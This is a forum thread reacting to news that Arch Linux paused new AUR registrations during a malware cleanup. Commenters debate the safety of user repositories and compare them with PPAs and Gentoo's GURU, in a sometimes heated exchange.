Arch Linux Blocks New AUR Registrations Amid Malware Cleanup
1d 19h ago by lemy.lol/u/cm0002 in linux@programming.dev from linuxiac.com
Yeah, they’re gonna have to change some policy. The 2-week ownership change for orphaned packages is just an obvious exploit now, but I’m sure more exist.
They should straight up take it down. This is affecting their distro's, and Linux's reputation.
I respect your opinion here, but they will absolutely not shut down the AUR since its the reason anyone uses Arch. Just like how piefed.ca doesn't shut down just because a few users upload illegal things.
Is there more context on the piefed.ca thing?
Its a hypothetical assumption created by me. I should have said lemmy.world since im 100% sure there have been users that have uploaded illegal content.
No, it just happened to be my instance.
As a side note, for some reason, I can't see any comments inside any post on this community. That's why I have to reply though my lemmy.ca alternate account.
It's a USER repository, where you literally download install files from unverified strangers.
There's a reason all the AUR helpers prompt you to verify all the files before they will build or install anything.
I wonder percentage of Arch users are actually capable of verifying that an AUR package is safe to install. I doubt that the number is very high, especially with the growing popularity of the distro
These days it's very small. Most people just wanna use Arch because it's cool.
While I do wholeheartedly think it's by far the best distro, I also frequently recommend Mint for newbies if they don't enjoy learning on their own.
In my case you can unironically blame Valve. I wanted an Arch-based distro to stay as close to SteamOS as possible but I have an nvidia GPU for the foreseeable future (unless I win the lottery or something).
Try CachyOS or just do like me and use their repo + kernel on Arch
Oh yeah that's what I'm using. Thanks though!
This! 👆
It’s still hosted on archlinux.org.
However “YMMV” the scripts are intended to be, they can’t host throngs of malware on their domain.
…Well, I guess they could if they want to become the next npm, but it still seems like a legal liability.
I’m not saying it should be taken down, but the status quo is definitely no longer acceptable.
The entire philosophy of Arch is to put user in control. The PKGBUILD format is plain-text and reviewable. The documented best practice has always been to read the PKGBUILD and the .install files before building.
I'm not saying they shouldn't look into measures to make it less prone to such attacks, but "take it down" is a very stupid take. If people can't deal with the existence of AUR, there's plenty of different distros to choose already.
In control of installing malware?
I get what you mean, but people are stupid. There needs to be guardrails to prevent these things from happening. That's why the AUR is a bad idea and it should be shut down.
You want your software to be available for a distro? Go through the proper channels. Submit it for review and get it approved. If you stop maintaining it, they remove it. Plain and simple.
That's why you don't have this problem with other distros. Arch made it too easy to download and install unverified, untested, potentially malicious software through the AUR and now every idiot that thinks they know what they're doing are infecting their systems.
There are some software that I only have because of AUR. For example, Brother printer drivers.
AUR is a great option to have. It doesn't mean people should use it for everything, when there's a perfectly capable version of the same software downloadable from Arch, Flathub or even through Distrobox.
Having options is a good thing, people just need to take care.
In fact, downloading something from AUR without checking it is hardly more dangerous than adding PPAs in Ubuntu.
Hahahahaha they also come in Debian .deb and Fedora .rpm packages. That's why I never got this problem with my hardware on Ubuntu or Debian.
And no it's not the same as PPAs.
Hahahahaha they also come in Debian .deb and Fedora .rpm packages. That’s why I never got this problem with my hardware on Ubuntu or Debian.
That is exactly why the AUR exists. To repackage that vendor's .deb into something Arch can safely manage. This makes Arch support to 3rd party apps almost unbeatable.
And you’re right: PPAs are not the same… in this regard they’re actually worse. AUR is at least in plain text and the documentation is clear: always check the PKGBUILD. When you add PPAs you’re blindly trusting a 3rd party repository and updating them with sudo.
You can’t burn the whole thing down just because, in your own words, “people are stupid”. They either read the documentation and follow the security policies, or they stick with Arch and Flathub. Or, they can simply choose a different distro. It’s that simple.
The thing is, I agree that AUR could have some sort of protection, such as a rate-limiting or a reputation system. But even as is, AUR is still an excellent feature that should definitely be maintained. And people, specially using Linux, definitely should educate themselves instead of exclusively rely on strangers for all their digital security.
Edited for extra clarification.
You completely missed the point.
Debian or Fedora don't need an AUR because vendors provide the packages themselves. And you know where they're coming from. You have the largest collection of software packages available, plus the 3rd party official packages available to download.
As for the PPAs, they're often provided by the software distributor themselves. Like Proton, or Wine. Most of the time you know who's providing the PPA. Ubuntu also keeps a close watch over these and will act if a malicious PPA is found. It won't take a lot of time before the PPA is taken down to prevent the spread. So it's relatively safer than a free for all repo where everybody is contributing and unmaintained packages get taken over. So, no. PPAs are not more dangerous than AUR.___
I didn't.
Saying that Debian and Fedora don't need an AUR because vendors provide packages, implying these distros are pratically immune to third-party malware is totally false. Fedora has COPR, openSUSE has OBS, and Ubuntu/Debian rely heavily on PPAs and random deb downloads from websites. See xz-utils: https://en.wikipedia.org/wiki/XZ_Utils_backdoor
Most FOSS developers do NOT have the time or infrastructure to package for every distro. They provide source code on GitHub. The AUR exists to translate that source (or a vendor's deb) into a native Arch package. Furthermore, downloading a random deb from a vendor's obscure website and installing it with dpkg (which runs pre-install scripts as root) is arguably less safe than a PKGBUILD that downloads the exact same binary from the vendor's official mirror, unpacks it, and lets you read exactly what it does before you run it.
Your conception of PPAs is riddled of misconceptions. Absolutely anyone can create a PPA. Canonical does not verify the identity of the uploader beyond email confirmation. Launchpad is flooded with unofficial, community-maintained PPAs that are no more "official" than an AUR maintainer.
Also, Ubuntu does NOT proactively audit the source code or binaries inside PPAs. They takes a PPA down after it has been reported and confirmed malicious, exactly the same as the Arch maintainers do with the AUR.
A PKGBUILD is a plain-text shell script. You can read the exact source URL, the compilation flags, and the install commands. A PPA provides a pre-compiled binary file. You have pretty much zero idea what is inside that binary. Blindly giving sudo access to a binary PPA is objectively more dangerous than auditing a 20-line bash script that compiles source code before running.
Arch Linux is a versatile, and simple distribution designed to fit the needs of the competent Linux® user.
Versatile, sure.
But Arch is anything but simple. The proof is the number of Arch spinoffs that were made to make it easier to install and use.
And any distro can be for competent Linux users. I mean, Linus Torvalds uses Fedora. I don't think theres a more competent user than him.
There's conceptual simplicity and there's UX. Arch is mostly the former.
Arch USER Repository. Use the official repositories if it's a concern.
AUR is not unique in being a user repository, but it seems somewhat unique in having basically zero oversight. Which is a bad idea for reasons that should be painfully obvious by now.
For comparison, Gentoo's GURU repository allows everyone to submit packages, but limits the ability to accept these submissions to a subset of trusted users
All community projects are open contribution. Most non-community ones too. You know, almost the whole point of open-source!
But that's not the same as "user repo", which is a wild west concept on purpose.
GURU bills itself as an official repository that's user-maintained. AUR makes no claims of being official as far as I can see from their website.
The AUR domain is aur.archlinux.org and it is linked from the menu-bar on archlinux.org. If AUR is not official, then the Arch sure is sending mixed signals to its users
With a nice, big disclaimer.
Which is not much different from the disclaimer about GURU, though GURU does a much better job at explaining the risks involved in using it:
Disclaimer
Please note that the GURU project is maintained and reviewed entirely by Gentoo users. It is only subject to minimal supervision from individual Gentoo developers, and is not supported by projects such as Gentoo Security. While our Trusted Contributors do their best to keep GURU safe, it is possible for it to contain vulnerable, badly broken or even malicious software. You are using it on your own responsibility.
Anyone infected is at their own fault. Literally every single ressource and official statement is "read the diff of what you execute", which would prevent 100% of the attacks.
I'd rather not get cut off from my regular updates for some idiots who can't read or think rules don't apply to them. And yes, people who don't understand the PKGBUILD format shouldn't use the AUR on their own.
100%
But this is the problem. It's like if Microsoft provided Windows with Limewire as a solution to download software. There's bound to be people who are going to exploit it for malicious reasons, and there's bound to be idiots who are going to fall for it. Heck, there's the possibility that even someone who knows what they're doing might also get caught at some point.
It's dangerous and irresponsible.
Arch doesn't come with the AUR "installed". The AUR is a repository of user scripts that exists on the internet. The user chooses to download the scripts, or install an AUR helper to download them automatically. There aren't even AUR helpers in the official Arch repos, so you need to go out of your way to install them.
Let's not take one out of Apple's playbook and limit what a user can do for "their owm safety" and because most people "don't know what's best for them".
You kind of have to have guardrails though. Especially with the recent migration from Windows 11 to Linux, a lot of gamers, mostly younger and/or inexperienced users, are being recommended Arch via CatchyOS. And a lot of the advice they get involve enabling the AUR and getting their required software from there. Some of the troubleshooting documentation also provides instructions using the AUR. It may not come with Arch, but it sounds to me like it's pretty indispensable.
On the other hand, you have people saying that Arch isn't for new users. That you have to be careful when using AUR and how dangerous it is. You have to know what you're doing.
So then why is it recommended so much? I feel like every other comment when people are asking questions on which Linux flavour to use the answer is always "just use Arch/just use X variant of Arch". And when I talk about using another distro like Debian, people on Linux communities get really critical and ask "this distro sucks, why don't you just use Arch/Catchy/X variant?"
So which is it? Is it for everyone or not? Is it safe to use or not? Should anybody be using it or not?
The comments are really conflicting with each other here.
And honestly if we're going to recommend Arch/Catchy/Whatever to new Linux adopters, there ought to be guardrails. Or don't recommend Arch. And DON'T recommend using AUR. Try other workarounds instead of taking the easy AUR solution. You don't simply give a loaded gun to someone who wants to do target practice without any precautions or anything to prevent them from hurting themselves or others. Maybe recommend an air-soft gun with some eye-protection goggles instead for target practice initially and let them learn the basics of firearm manipulation using that before moving on to the real deal.
The AUR is not indispensable for Arch, and it is not recommended. The Arch Wiki itself says so, and it even recommends against AUR helpers, because it makes the AUR feel like any other official repo. Some Arch based distros do include AUR helpers by default, and that's on them.
Arch isn't even that recommended, and it's only mentioned above other distros in the gaming sphere because it usually has the freshest drivers and innovations due to being bleeding edge. It is also easy to install and easy to use, and for almost any issue you can consult the Arch Wiki or the Arch Forums.
Either way, we should never limit user freedom in the name of making it "safer" for any user, and we shouldn't be installing guardrails that limit what you can do with your OS. That's the difference between Windows/Mac and Linux. Linux allows freedom, while the others limit it. The "guardrails" are already there, in the Arch Wiki, as a pretty visible warning. If a user doesn't read the recommendations from the official wiki, that's on them.
As an aside, your gun analogy is not valid. A gun is a dangerous tool with which a user can hurt themselves, but also other people. Allowing freedom on a Linux distro is just a way of allowing the user to shoot themselves in the foot (like it has always been possible, one way or another, in every Linux distro). But it doesn't allow the user to hurt others. Let's not do these comparisons.
Peak Linux nerd shit.
People just want their updates to work and you're out here screeching that users are holding it wrong and to read a bunch of diffs 🤣
That's like saying "i just want to bungee jump off this bridge" when the bridge is 10m above active traffic.
This piece of infrastructure is not designed to work this way. It's made for linux nerds. Not unknowing users. And I don't see why the AUR should punish the former because the latter are ignorant. So either be able to understand and actively read the things you're running or just don't.
That is some gatekeeping bullshit right there.
How is that gatekeeping?
No, it's actual reality. There are more than a hundred thousand packages in the AUR. There are explicit warnings that these are user content and should be used with care.
And now a miniscule percentage (~1%) of orphaned packages, so those with very little interest in, are taken over by some malicious actors to spread malware.
And people suddenly pretend like this is a catastrophe for Linux (no one cares) and for Arch and it's derivates (who don't operate the AUR be definition and explicitly warn against using it without caution). If I told you that not 1, but 10% of the most obscure software packages you can download and install on Windows are pure malware, you wouldn't even blink an eye. And yet all the morons now come crawling from their caves flooding everything with memes and bullshit of "haha, now we know you lied to us and Linux isn't secure at all!".
I think we should be proud. Linux is finally large enough to at least sort of get "hit" by a malware campaign, and it demonstrates the ease with which thousands of infected packages can be cleaned, because they are centralized to a few repositories. M$'s only bet would be to update Defenders' index and cross fingers that the signature doesn't change.
Windows malware is always way out of control of M$, while that's also the norm of uninfected programs.
Almost all Linux programs are by design installed from a central repo.
Yeah, I've seen those warnings, and you make a great argument! In practice generally no one was checking those packages because then the AUR becomes less convenient than building from source (and the AUR is a bonus for using Arch.) -It's like saying 'all eyes on code' when time and time again relatively no one is actually auditing and everyone just assumes the myths and lies are right.
There are plenty of other distros users can choose from, if they don't want to deal with that. But picking one that is designed for advanced "nerdy" users and then ignoring those explicit warnings is just pure negligence.
Well then stop recommending Arch or CatchyOS to every new user that comes in here looking for a gaming Linux distro ffs.
Well, I dont. I'm fully aware of the footguns Arch based distros contain. I generally recommend Mint for Linux beginners. If the person is tech savvy and needs something for their gaming rig, then I might mention Bazzite.
No no, they're right. This is arch linux, people demonstrably do not 'just' want their updates to work
Peak Linux nerd shit.
Next thing you're gonna tell me you eat random shit found on the road and it's nerd bullshit to check if it's safe or not.
LOL!
All these Arch fanboys just can't accept ANY criticism of their favourite Linux flavour. "IT'S THE BEST OKAY? EVERYBODY SAYS SO! IT'S THE BEST BECAUSE IT'S HARD TO USE AND ALL THE SOFTWARE IS BLEEDING EDGE AND MY SYSTEM BREAKS HALF THE TIME I DO AN UPDATE BUT THAT'S NORMAL LINUX SHIT OKAY? AND I USE THE AUR BECAUSE I KNOW WHAT I'M DOING EVEN THOUGH MY SYSTEM IS INFECTED OKAY?"
Yeah. The ArchLinux corporation must be losing money left and right because of this.
Are they stupid?!